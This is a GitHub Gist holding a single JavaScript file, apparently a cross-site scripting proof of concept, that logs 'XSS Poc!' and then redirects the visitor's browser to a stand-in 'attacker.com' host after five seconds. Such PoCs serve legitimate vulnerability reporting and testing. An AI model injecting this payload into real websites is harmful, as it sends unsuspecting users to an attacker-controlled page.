Skip to content

Instantly share code, notes, and snippets.

@betillogalvanfbc
Created September 29, 2023 19:24
Show Gist options
  • Save betillogalvanfbc/fdfd8aa330df959d60ee4da4c19cea71 to your computer and use it in GitHub Desktop.
Save betillogalvanfbc/fdfd8aa330df959d60ee4da4c19cea71 to your computer and use it in GitHub Desktop.
s.js
console.log('XSS Poc!');setTimeout(() => window.location.href = 'https://attacker.com', 5000);
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment